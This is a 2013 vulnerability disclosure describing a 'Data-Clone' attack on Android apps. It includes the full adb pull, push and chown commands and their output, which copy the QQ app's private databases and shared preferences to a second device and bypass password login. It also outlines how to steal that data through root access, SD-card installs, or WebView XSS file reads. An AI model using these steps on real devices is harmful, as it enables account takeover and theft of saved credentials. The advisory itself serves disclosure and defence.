"Data-Clone" -- a new way to attack android apps
Author: SuperHei () www knownsec com [Email:5up3rh3i#gmail.com]
Release Date: 2013/03/16
References: http://www.80vul.com/android/data-clone.txt
Chinese Version:
http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/
--[ I - Introduction
This is a new way to attack android apps t,and i call it "Data-Clone
Attack". it can bypass password authentication ,when user login the
app and set "remember password"(some apps is define).
--[ II - Description
let us use a demo to illustrat it , This is a test procedure:
1. open two emulator.
adb devices
List of devices attached
emulator-5554 device
emulator-5556 device
both devices install
"com.tencent.mobileqq"(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse,
you also can use other applications to test.
2. login the app on "emulator-5554" and make sure you choose the
"remember password".
then pull the app data to your PC
adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab
pull: building file list...
pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db ->
d:\\aab/databases/qcenter.Db
pull: /data/data/com.tencent.mobileqq/databases/*************.db ->
d:\\aab/databases/*************.db
pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml ->
d:\\aab/shared_prefs/only.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml ->
d:\\aab/shared_prefs/share.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
-> d:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml ->
d:\\aab/shared_prefs/mobileQQ.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml
-> d:\\aab/shared_prefs/*************.xml
pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\\aab/files/ADPic/457
pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml ->
d:\\aab/files/Skin/skinmain.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png ->
d:\\aab/files/Skin/tab_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml ->
d:\\aab/files/Skin/thumbnail_skin.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png ->
d:\\aab/files/Skin/title_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat ->
d:\\aab/files/sc/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat ->
d:\\aab/files/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/runningApp ->
d:\\aab/files/runningApp
pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\\aab/lib/libamrnb.so
pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so ->
d:\\aab/lib/libaudiohelper.so
pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so ->
d:\\aab/lib/libcodecwrapper.so
pull: /data/data/com.tencent.mobileqq/lib/libCommon.so ->
d:\\aab/lib/libCommon.so
pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\\aab/lib/liblbs.so
pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so ->
d:\\aab/lib/libmsfboot.so
pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so ->
d:\\aab/lib/libsnapcore.so
pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so ->
d:\\aab/lib/libVideoCtrl.so
23 files pulled. 0 files skipped.
88 KB/s (4431172 bytes in 49.011s)
3. push the data to "emulator-5556"
adb -s emulator-5556 push D:\\aab /data/data/com.tencent.mobileqq/
push: D:\\aab/databases/qcenter.Db ->
/data/data/com.tencent.mobileqq/databases/qcenter.Db
push: D:\\aab/databases/*************.db ->
/data/data/com.tencent.mobileqq/databases/*************.db
push: D:\\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457
push: D:\\aab/files/sc/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat
push: D:\\aab/files/Skin/title_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png
push: D:\\aab/files/Skin/thumbnail_skin.xml ->
/data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml
push: D:\\aab/files/Skin/tab_bg_bar.png ->
/data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png
push: D:\\aab/files/Skin/skinmain.xml ->
/data/data/com.tencent.mobileqq/files/Skin/skinmain.xml
push: D:\\aab/files/runningApp ->
/data/data/com.tencent.mobileqq/files/runningApp
push: D:\\aab/files/ConfigStore2.dat ->
/data/data/com.tencent.mobileqq/files/ConfigStore2.dat
push: D:\\aab/lib/libVideoCtrl.so ->
/data/data/com.tencent.mobileqq/lib/libVideoCtrl.so
push: D:\\aab/lib/libsnapcore.so ->
/data/data/com.tencent.mobileqq/lib/libsnapcore.so
push: D:\\aab/lib/libmsfboot.so ->
/data/data/com.tencent.mobileqq/lib/libmsfboot.so
push: D:\\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so
push: D:\\aab/lib/libCommon.so ->
/data/data/com.tencent.mobileqq/lib/libCommon.so
push: D:\\aab/lib/libcodecwrapper.so ->
/data/data/com.tencent.mobileqq/lib/libcodecwrapper.so
push: D:\\aab/lib/libaudiohelper.so ->
/data/data/com.tencent.mobileqq/lib/libaudiohelper.so
push: D:\\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so
push: D:\\aab/shared_prefs/share.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/share.xml
push: D:\\aab/shared_prefs/only.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/only.xml
push: D:\\aab/shared_prefs/mobileQQ.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml
push: D:\\aab/shared_prefs/com.tencent.mobileqq_preferences.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
push: D:\\aab/shared_prefs/*************.xml ->
/data/data/com.tencent.mobileqq/shared_prefs/*************.xml
23 files pushed. 0 files skipped.
69 KB/s (4431172 bytes in 62.108s)
4. adb-shell to "emulator-5556"
adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1 app_1 2012-09-24 02:43 com.android.htmlviewer
....
drwxr-x--x app_35 app_35 2012-12-06 07:17 com.tencent.mobileqq
and get the com.tencent.mobileqq owner is “app_35”。
Because push the data is ROOT :
# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root root 2012-12-06 07:17 shared_prefs
drwxrwxr-x root root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x system system 2012-12-06 07:17 lib
so we need to chown :
# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35 root 2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35 root 2012-12-06 07:16 databases
drwxrwx--x app_35 app_35 2012-12-06 07:10 cache
drwxrwx--x app_35 app_35 2012-12-06 07:16 files
drwxr-xr-x app_35 system 2012-12-06 07:17 lib
5.open the app on "emulator-5556", and u have login the
com.tencent.mobileqq on "emulator-5556".
--[ III - How to exploit
"How to get the contents of data" is key to the completion of the
attack. some like this:
1. Already have super privileges
under the root shell like the demo,u can bypass password
authentication used "Data-Clone Attack".
2. apps install on SDcard
the others have read permissions to obtain the app's data.
3. Cross-site scripting on android
app + webview + xss(or webkit xcs vul) = "Data-Clone"
On older version of android , android app's xss or webkit xcs vul can
read the loacl file's contents :
http://www.80vul.com/android/android-0days.txt
So the app's webview have the file read permissions to the app's data.
when a app user visit a URL link,the data will Be cloned。
--[ IV - Disclosure Timeline
2012/03/ - Found this
2012/12/10 - Report it to security () android com
from vendor
......For a long time has passed......
2013/03/16 - security () android com do not have any response
(maybe,because Google was not andriod's biological mother)
2013/03/16 -Public Disclosure
hitest
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of